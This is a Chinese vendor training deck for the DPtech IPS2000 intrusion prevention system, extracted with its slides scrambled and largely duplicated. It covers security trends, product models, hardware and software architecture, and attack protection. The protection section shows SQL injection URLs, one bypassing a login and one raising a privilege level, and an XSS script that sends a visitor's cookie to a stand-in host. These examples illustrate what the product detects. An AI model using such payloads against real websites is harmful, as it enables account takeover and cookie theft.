DPtech IPS2000系列入侵防御系统培训胶片
合集下载
相关主题
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
某论坛用户修改密码的页面代码如下: $sql = "UPDATE $tblname SET pwd = '$password' WHERE username = '$username'"; $result = mysql_query($sql) ; IE中正常的URL如下:
http://a.b.c.d/changepwd.php?username=dptech&pwd=dptec h SQL语句为:UPDATE user SET pwd = ‘dptech' WHERE username = ‘dptech'
www.diputech.com
31
IPS攻击防护-Web安全-其他
• LDAP注入 • 目录穿越 • 命令注入
• PHP文件包含
www.diputech.com
32
IPS攻击防护-缓冲区溢出
• 原理
– 栈溢出 – 堆溢出
• 危害
– 获取系统控制权
www.diputech.com
33
IPS攻击防护-缓冲区溢出-MS08-067
DPtech IPS2000入侵防御系统
目
录
安全趋势 产品介绍 技术特点 组网模式 典型配置
运维管理
www.diputech.com
1
安全事件不断爆发
根据国家计算机网络应急技术处理协调中心(简称CNCERT/CC)报告,网 络安全事件依然持续不断爆发。
2009 年CNCERT 共接收21927 件网络安全事件报告
17
目
录
安全趋势 产品介绍 技术特点 组网模式 典型配置
运维管理
www.diputech.com
18
超强性能
• 多核CPU+大容量FPGA,实现不同会话的并行处理
• 硬件网络加速单元NA按照不同的报文内容,将不同的会 话分发到不同的CPU进行处理,同时实现CPU间均衡负载 分担
• 深度流检测引擎只进行一次匹配,输出检测结果供后续策 略模块使用
www.diputech.com
16
DPtech系列产品软件架构
– Web应用防护引擎
对HTTP报文进行细致分析,完成协议切分、进行解码处 理、进行负载处理以及进行语法和语义分析,防护多 种Web攻击
– DDos检测引擎
基于报文内容和统计学原理,精确识别各种DDos攻击
www.diputech.com
8
DPtech IPS2000产品系列
万兆级
IPS2000-TS-N
千兆级
IPS2000-GS-N IPS2000-GA-N IPS2000-GE-N
百兆级
IPS2000-MC-N IPS2000-MS-N IPS2000-MA-N IPS2000-ME-N
迪普科技拥有从百兆至万兆的全系列入侵防御系统,可覆盖中小
• 危害
– 存在漏洞的是网站,被攻击的是浏览该网站的用户
www.diputech.com
29
IPS攻击防护-Web安全-XSS案例
假设某BBS网站可以发贴 1、攻击者在发贴区域发布脚本,其中包含恶意代码, 例如重定向到某个恶意网站 <script>document.localiton=’http://mys ite.com/steal_cookie.php?’%2Bdocument. cookie</script> 2、浏览者正常浏览该页面,正常情况下应该看到发 布的内容,但服务器在传给客户端的HTML页面中包 含了这段代码,导致用户的页面被重定向到恶意网站 3、恶意网站可以收集访问它的用户的个人信息
4
趋势三:安全漏洞不断爆发
网络设备、操作系统、数据库软件、应用软件漏洞数不胜数
微软操作系统视频功能组件高危漏洞
微软Office 组件高危漏洞 微软IE 浏览器0day 漏洞 域名系统软件Bind 9 高危漏洞 ……
Zero Day Attack!
www.diputech.com
5
Mbps (Average per Hour)
2个管理口(千兆自适应、电 口 )6 个千兆自适应电口 ( 内 置3组掉电保护)6 个千兆自 适应光口
2GE 光 口 , 6GE电口,一 个插槽, 2 个 GE管理口
2个管理口(千 兆自适应、电 口 )6 个 千 兆 自 适应电口
www.diputech.com
13
DPtech系列产品硬件架构
– 多核CPU硬件架构
趋势四:安全威胁多样化
应用层 安全威胁
网络钓鱼
蠕虫/病毒
www.diputech.com 6
趋势五:利益驱动下的信息犯罪
越来越多信息安全事件是以经济利益为驱动
病毒、木马、攻击已形成产业链
www.diputech.com
7
目
录
安全趋势 产品介绍 技术特点 组网模式 典型配置
运维管理
www.diputech.com
IPS2000-GE-N
www.diputech.com
11
DPtech IPS2000产品系列
IPS2000-TS-N
www.diputech.com
12
DPtech IPS2000产品系列
型号 IPS2000-TS-N IPS2000-GE-N IPS 2000-GA-N IPS 2000-GS-N IPS 2000ME-N IPS 2000-MA -N
100 120 140 160 180 200 20 40 60 80 0 HTTP E-mail Kazaa Oracle WinMX eDonkey P2P Rate Limit
13 :0 0 19 :0 0 1: 00 7: 00 13 :0 0 19 :0 0 1: 00 7: 00 13 :0 0 19 :0 0 1: 00 7: 00 13 :0 0 19 :0 0 1: 00 7: 00 13 :0 0 19 :0 0 1: 00 7: 00 13 :0 0 19 :0 0 1: 00 7: 00 13 :0 0 19 :0 0 1: 00 7: 00 13 :0 0 19 :0 0
型企业、大型企业以及运营商的各种应用层安全防护需求。
www.diputech.com
9
DPtech IPS2000产品系列
IPS2000-MC/MS/MA-N
IPS2000-ME–N
千兆光口
千兆电口 管理口
串口
www.diputech.com 10
DPtech IPS2000产品系列
IPS2000-GS/GA-N
• MS08-067:服务器服务中的漏洞可能允许远程执 行代码 • 漏洞原因:Windows系统在处理特定格式的RPC 请求时,在解析其中目录格式的时候存在缓冲区 溢出漏洞,远程攻击者可以通过这个漏洞实现对 系统的完全控制 • 攻击报文:
5.支持SQL注入探测(and攻击/or攻击/数据库类型查 询攻击/表名查询攻击等)
6. 支持SQL注入攻击(联合查询攻击/数据更新攻击/数 据删除攻击/通过数据库执行系统命令攻击)
www.diputech.com 28
IPS攻击防护-Web安全-XSS
• 原理
– 网站对输入过滤不严格 – 攻击者往Web页面的html代码中插入恶意的数据,用户 认为该页面是可信赖的,当用户浏览该页之时,嵌入 Web页里的恶意代码/脚本会被执行
提高CPU处理能力,多核并发处理网络流量,提高设 备处理性能
– 内置FPGA硬件以及硬件逻辑检测引擎
通过FPGA的硬件检测引擎,极大的提高设备性能以及 设备的竞争力
www.diputech.com
14
DPtech系列产品硬件架构
– 内置高速网络转发和处理芯片
网络接口密度高、数量多、接口类型丰富,能够满足 各种部署和组网需求
吞吐量 并发会话数 新建会话数
12Gbps 400W 20W/S 2U
6Gbps 400W 20W/S 2U
3Gbps 100W 4W/S 1U
1.5Gbps 100W 2W/S 1U
800Mbps 100W 2W/S 1U
300Mbps 20W 1W/S 1U
高度
接口
2 个管理口 ( 千兆自适应、 电口 )12个千兆自适用电口 ( 内置 3 组掉电保护 )12 个千 兆自适应光口,2个万兆光 口,1个RJ45串口,1 个USB 口
www.diputech.com 2
趋势一:网络无边界
VPN、移动办公、无线网络等应用日渐增多,网络边界日益模糊,以防火 墙为代表的传统边界安全防护手段无能为力
边界在哪里?
www.diputech.com
3
趋势二:新业务模式层出不穷
WEB2.0
云计算
P2P应用
网上支付
www.diputech.com
• 危害
– – – – 获取系统控制权 未经授权状况下操作数据库的数据 恶意篡改网页内容 私自添加系统帐号或数据库使用者帐号
www.diputech.com
23
IPS攻击防护-Web安全-SQL注入案例1
某论坛用户登录的页面代码如下:
$sql = "SELECT * FROM user WHERE username = '$username' AND pwd = '$password'"; $result = mysql_query($sql) ; IE中正常的URL如下:
– 掉电保护模块
保证在异常断电等各种突发环境下的网络可用性,从 而保证设备的可靠性
Leabharlann Baidu
www.diputech.com
15
DPtech系列产品软件架构
– 网络操作系统平台
自主研发的高性能网络操作系统平台,支撑各种不同 的网络产品,同时保障相同产品的各种款型系列资源 整合
– 深度流检测引擎
算法的性能与特征多少无关,检测引擎只需对报文内 容检测一次,即能满足多种检测需求,如协议特征、 病毒特征、IPS特征、url特征等各种特征挖掘,大大提 高多复杂并发业务的检测性能
http://a.b.c.d/user.php?username=dptech&&pw d=dptech
SQL语句为:SELECT * FROM user WHERE username = ‘dptech' AND pwd = ‘dptech'
www.diputech.com
24
IPS攻击防护-Web安全-SQL注入案例1
IPS攻击防护
• 漏洞都是由于应用系统的错误导致的,针对不同 的防护对象可以开启不同的防护策略 • IPS具备全面的攻击防护功能
– – – – – Web安全 缓冲区溢出漏洞 操作系统漏洞 恶意代码 协议异常功能
www.diputech.com
22
IPS攻击防护-Web安全-SQL注入
• 原理
– 利用程序中的漏洞,构造特殊的SQL语句并提交以获 取敏感信息
构造如下的URL: http://a.b.c.d/user.php?username=dptech’/*
实际插入的SQL语句变为: SELECT * FROM user WHERE username = ‘dptech'/*' AND pwd = ''
www.diputech.com
25
IPS攻击防护-Web安全-SQL注入案例2
www.diputech.com
27
IPS攻击防护-Web安全-SQL注入防范
1.通过分析SQL语法和语义,进行精确识别 2.只在GET消息的URL部分和POST消息的负载部分检 测,减少误报 3.针对知名SQL注入工具进行特征提取(穿山甲、 HDSL) 4.支持主流数据库的注入攻击(SQL Server/Mysql/Oracle)
www.diputech.com
26
IPS攻击防护-Web安全-SQL注入案例2
构造如下的URL:
http://a.b.c.d/changepwd.php?username=dptech&pwd=abcd ’, level=’3
实际插入的SQL语句变为: UPDATE user SET pwd = 'abcd',level='3' WHERE username = ‘dptech’
www.diputech.com
30
IPS攻击防护-Web安全-XSS防护
1.通过分析XSS的语义,进行精确识别 2.只在GET消息的URL部分和POST消息的负载部分检 测,减少误报 3.针对各种XSS攻击探测进行识别(alert攻击/script攻 击/iframe攻击) 4.支持多个Web应用程序攻击 ( phpCommunityCalendar/ Tikiwiki/PHPBB等跨站 脚本攻击)
www.diputech.com
19
超强性能
报文
FPGA
10GE 通道 10GE 通道 交换芯片
CPU
转发
www.diputech.com
20
超强性能
FPGA
深度流检测引擎 报文 10GE 通道 Web防护引擎 10GE 通道 DDos引擎 交换芯片 其他业务
CPU
协议分析引擎
转发
www.diputech.com 21
http://a.b.c.d/changepwd.php?username=dptech&pwd=dptec h SQL语句为:UPDATE user SET pwd = ‘dptech' WHERE username = ‘dptech'
www.diputech.com
31
IPS攻击防护-Web安全-其他
• LDAP注入 • 目录穿越 • 命令注入
• PHP文件包含
www.diputech.com
32
IPS攻击防护-缓冲区溢出
• 原理
– 栈溢出 – 堆溢出
• 危害
– 获取系统控制权
www.diputech.com
33
IPS攻击防护-缓冲区溢出-MS08-067
DPtech IPS2000入侵防御系统
目
录
安全趋势 产品介绍 技术特点 组网模式 典型配置
运维管理
www.diputech.com
1
安全事件不断爆发
根据国家计算机网络应急技术处理协调中心(简称CNCERT/CC)报告,网 络安全事件依然持续不断爆发。
2009 年CNCERT 共接收21927 件网络安全事件报告
17
目
录
安全趋势 产品介绍 技术特点 组网模式 典型配置
运维管理
www.diputech.com
18
超强性能
• 多核CPU+大容量FPGA,实现不同会话的并行处理
• 硬件网络加速单元NA按照不同的报文内容,将不同的会 话分发到不同的CPU进行处理,同时实现CPU间均衡负载 分担
• 深度流检测引擎只进行一次匹配,输出检测结果供后续策 略模块使用
www.diputech.com
16
DPtech系列产品软件架构
– Web应用防护引擎
对HTTP报文进行细致分析,完成协议切分、进行解码处 理、进行负载处理以及进行语法和语义分析,防护多 种Web攻击
– DDos检测引擎
基于报文内容和统计学原理,精确识别各种DDos攻击
www.diputech.com
8
DPtech IPS2000产品系列
万兆级
IPS2000-TS-N
千兆级
IPS2000-GS-N IPS2000-GA-N IPS2000-GE-N
百兆级
IPS2000-MC-N IPS2000-MS-N IPS2000-MA-N IPS2000-ME-N
迪普科技拥有从百兆至万兆的全系列入侵防御系统,可覆盖中小
• 危害
– 存在漏洞的是网站,被攻击的是浏览该网站的用户
www.diputech.com
29
IPS攻击防护-Web安全-XSS案例
假设某BBS网站可以发贴 1、攻击者在发贴区域发布脚本,其中包含恶意代码, 例如重定向到某个恶意网站 <script>document.localiton=’http://mys ite.com/steal_cookie.php?’%2Bdocument. cookie</script> 2、浏览者正常浏览该页面,正常情况下应该看到发 布的内容,但服务器在传给客户端的HTML页面中包 含了这段代码,导致用户的页面被重定向到恶意网站 3、恶意网站可以收集访问它的用户的个人信息
4
趋势三:安全漏洞不断爆发
网络设备、操作系统、数据库软件、应用软件漏洞数不胜数
微软操作系统视频功能组件高危漏洞
微软Office 组件高危漏洞 微软IE 浏览器0day 漏洞 域名系统软件Bind 9 高危漏洞 ……
Zero Day Attack!
www.diputech.com
5
Mbps (Average per Hour)
2个管理口(千兆自适应、电 口 )6 个千兆自适应电口 ( 内 置3组掉电保护)6 个千兆自 适应光口
2GE 光 口 , 6GE电口,一 个插槽, 2 个 GE管理口
2个管理口(千 兆自适应、电 口 )6 个 千 兆 自 适应电口
www.diputech.com
13
DPtech系列产品硬件架构
– 多核CPU硬件架构
趋势四:安全威胁多样化
应用层 安全威胁
网络钓鱼
蠕虫/病毒
www.diputech.com 6
趋势五:利益驱动下的信息犯罪
越来越多信息安全事件是以经济利益为驱动
病毒、木马、攻击已形成产业链
www.diputech.com
7
目
录
安全趋势 产品介绍 技术特点 组网模式 典型配置
运维管理
www.diputech.com
IPS2000-GE-N
www.diputech.com
11
DPtech IPS2000产品系列
IPS2000-TS-N
www.diputech.com
12
DPtech IPS2000产品系列
型号 IPS2000-TS-N IPS2000-GE-N IPS 2000-GA-N IPS 2000-GS-N IPS 2000ME-N IPS 2000-MA -N
100 120 140 160 180 200 20 40 60 80 0 HTTP E-mail Kazaa Oracle WinMX eDonkey P2P Rate Limit
13 :0 0 19 :0 0 1: 00 7: 00 13 :0 0 19 :0 0 1: 00 7: 00 13 :0 0 19 :0 0 1: 00 7: 00 13 :0 0 19 :0 0 1: 00 7: 00 13 :0 0 19 :0 0 1: 00 7: 00 13 :0 0 19 :0 0 1: 00 7: 00 13 :0 0 19 :0 0 1: 00 7: 00 13 :0 0 19 :0 0
型企业、大型企业以及运营商的各种应用层安全防护需求。
www.diputech.com
9
DPtech IPS2000产品系列
IPS2000-MC/MS/MA-N
IPS2000-ME–N
千兆光口
千兆电口 管理口
串口
www.diputech.com 10
DPtech IPS2000产品系列
IPS2000-GS/GA-N
• MS08-067:服务器服务中的漏洞可能允许远程执 行代码 • 漏洞原因:Windows系统在处理特定格式的RPC 请求时,在解析其中目录格式的时候存在缓冲区 溢出漏洞,远程攻击者可以通过这个漏洞实现对 系统的完全控制 • 攻击报文:
5.支持SQL注入探测(and攻击/or攻击/数据库类型查 询攻击/表名查询攻击等)
6. 支持SQL注入攻击(联合查询攻击/数据更新攻击/数 据删除攻击/通过数据库执行系统命令攻击)
www.diputech.com 28
IPS攻击防护-Web安全-XSS
• 原理
– 网站对输入过滤不严格 – 攻击者往Web页面的html代码中插入恶意的数据,用户 认为该页面是可信赖的,当用户浏览该页之时,嵌入 Web页里的恶意代码/脚本会被执行
提高CPU处理能力,多核并发处理网络流量,提高设 备处理性能
– 内置FPGA硬件以及硬件逻辑检测引擎
通过FPGA的硬件检测引擎,极大的提高设备性能以及 设备的竞争力
www.diputech.com
14
DPtech系列产品硬件架构
– 内置高速网络转发和处理芯片
网络接口密度高、数量多、接口类型丰富,能够满足 各种部署和组网需求
吞吐量 并发会话数 新建会话数
12Gbps 400W 20W/S 2U
6Gbps 400W 20W/S 2U
3Gbps 100W 4W/S 1U
1.5Gbps 100W 2W/S 1U
800Mbps 100W 2W/S 1U
300Mbps 20W 1W/S 1U
高度
接口
2 个管理口 ( 千兆自适应、 电口 )12个千兆自适用电口 ( 内置 3 组掉电保护 )12 个千 兆自适应光口,2个万兆光 口,1个RJ45串口,1 个USB 口
www.diputech.com 2
趋势一:网络无边界
VPN、移动办公、无线网络等应用日渐增多,网络边界日益模糊,以防火 墙为代表的传统边界安全防护手段无能为力
边界在哪里?
www.diputech.com
3
趋势二:新业务模式层出不穷
WEB2.0
云计算
P2P应用
网上支付
www.diputech.com
• 危害
– – – – 获取系统控制权 未经授权状况下操作数据库的数据 恶意篡改网页内容 私自添加系统帐号或数据库使用者帐号
www.diputech.com
23
IPS攻击防护-Web安全-SQL注入案例1
某论坛用户登录的页面代码如下:
$sql = "SELECT * FROM user WHERE username = '$username' AND pwd = '$password'"; $result = mysql_query($sql) ; IE中正常的URL如下:
– 掉电保护模块
保证在异常断电等各种突发环境下的网络可用性,从 而保证设备的可靠性
Leabharlann Baidu
www.diputech.com
15
DPtech系列产品软件架构
– 网络操作系统平台
自主研发的高性能网络操作系统平台,支撑各种不同 的网络产品,同时保障相同产品的各种款型系列资源 整合
– 深度流检测引擎
算法的性能与特征多少无关,检测引擎只需对报文内 容检测一次,即能满足多种检测需求,如协议特征、 病毒特征、IPS特征、url特征等各种特征挖掘,大大提 高多复杂并发业务的检测性能
http://a.b.c.d/user.php?username=dptech&&pw d=dptech
SQL语句为:SELECT * FROM user WHERE username = ‘dptech' AND pwd = ‘dptech'
www.diputech.com
24
IPS攻击防护-Web安全-SQL注入案例1
IPS攻击防护
• 漏洞都是由于应用系统的错误导致的,针对不同 的防护对象可以开启不同的防护策略 • IPS具备全面的攻击防护功能
– – – – – Web安全 缓冲区溢出漏洞 操作系统漏洞 恶意代码 协议异常功能
www.diputech.com
22
IPS攻击防护-Web安全-SQL注入
• 原理
– 利用程序中的漏洞,构造特殊的SQL语句并提交以获 取敏感信息
构造如下的URL: http://a.b.c.d/user.php?username=dptech’/*
实际插入的SQL语句变为: SELECT * FROM user WHERE username = ‘dptech'/*' AND pwd = ''
www.diputech.com
25
IPS攻击防护-Web安全-SQL注入案例2
www.diputech.com
27
IPS攻击防护-Web安全-SQL注入防范
1.通过分析SQL语法和语义,进行精确识别 2.只在GET消息的URL部分和POST消息的负载部分检 测,减少误报 3.针对知名SQL注入工具进行特征提取(穿山甲、 HDSL) 4.支持主流数据库的注入攻击(SQL Server/Mysql/Oracle)
www.diputech.com
26
IPS攻击防护-Web安全-SQL注入案例2
构造如下的URL:
http://a.b.c.d/changepwd.php?username=dptech&pwd=abcd ’, level=’3
实际插入的SQL语句变为: UPDATE user SET pwd = 'abcd',level='3' WHERE username = ‘dptech’
www.diputech.com
30
IPS攻击防护-Web安全-XSS防护
1.通过分析XSS的语义,进行精确识别 2.只在GET消息的URL部分和POST消息的负载部分检 测,减少误报 3.针对各种XSS攻击探测进行识别(alert攻击/script攻 击/iframe攻击) 4.支持多个Web应用程序攻击 ( phpCommunityCalendar/ Tikiwiki/PHPBB等跨站 脚本攻击)
www.diputech.com
19
超强性能
报文
FPGA
10GE 通道 10GE 通道 交换芯片
CPU
转发
www.diputech.com
20
超强性能
FPGA
深度流检测引擎 报文 10GE 通道 Web防护引擎 10GE 通道 DDos引擎 交换芯片 其他业务
CPU
协议分析引擎
转发
www.diputech.com 21